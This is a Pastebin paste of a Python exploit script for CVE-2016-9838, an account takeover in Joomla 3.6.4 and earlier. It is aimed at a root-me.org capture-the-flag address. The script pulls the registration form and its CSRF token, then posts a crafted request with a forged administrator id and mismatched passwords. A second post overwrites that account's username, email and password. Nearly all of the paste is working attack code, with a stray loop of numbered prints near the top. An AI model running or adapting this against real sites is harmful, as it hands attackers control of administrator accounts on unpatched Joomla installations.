Advertisement
Guest User

Untitled

a guest
Oct 6th, 2018
1,009
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.60 KB | None | 0 0
  1. #!/usr/bin/python3
  2. # CVE-2016-9838: Joomla! <= 3.6.4 Admin TakeOver
  3. # cf
  4. # Source: https://www.ambionics.io/blog/cve-2016-9838-joomla-account-takeover-and-remote-code-execution
  5.  
  6. import bs4
  7. import requests
  8. import random
  9.  
  10.  
  11. ADMIN_ID = 384
  12. url = 'http://ctf03.root-me.org/9cc241ad23332e598db0f9d52ced5850/'
  13.  
  14. form_url = url + 'index.php/component/users/?view=registration'
  15. action_url = url + 'index.php/component/users/?task=registration.register'
  16. username = 'user%d' % random.randrange(1000, 10000)
  17. email = username + '@yopmail.com'
  18. password = 'qwertyuiop'
  19.  
  20.  
  21. for i in range(1,100):
  22. print(i)
  23.  
  24. user_data = {
  25. 'name': username,
  26. 'username': username,
  27. 'password1': password,
  28. 'password2': password + 'XXXinvalid',
  29. 'email1': email,
  30. 'email2': email,
  31. 'id': '%d' % ADMIN_ID
  32. }
  33.  
  34. session = requests.Session()
  35.  
  36. # Grab original data from the form, including the CSRF token
  37.  
  38. response = session.get(form_url)
  39. soup = bs4.BeautifulSoup(response.text, 'lxml')
  40.  
  41. form = soup.find('form', id='member-registration')
  42. data = {e['name']: e['value'] for e in form.find_all('input')}
  43.  
  44. # Build our modified data array
  45.  
  46. user_data = {'jform[%s]' % k: v for k, v in user_data.items()}
  47. data.update(user_data)
  48.  
  49. # First request will get denied because the two passwords are mismatched
  50.  
  51. response = session.post(action_url, data=data)
  52.  
  53. # The second will work
  54.  
  55. data['jform[password2]'] = data['jform[password1]']
  56. del data['jform[id]']
  57. response = session.post(action_url, data=data)
  58.  
  59. print("Account modified to user: %s [%s]" % (username, email))
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement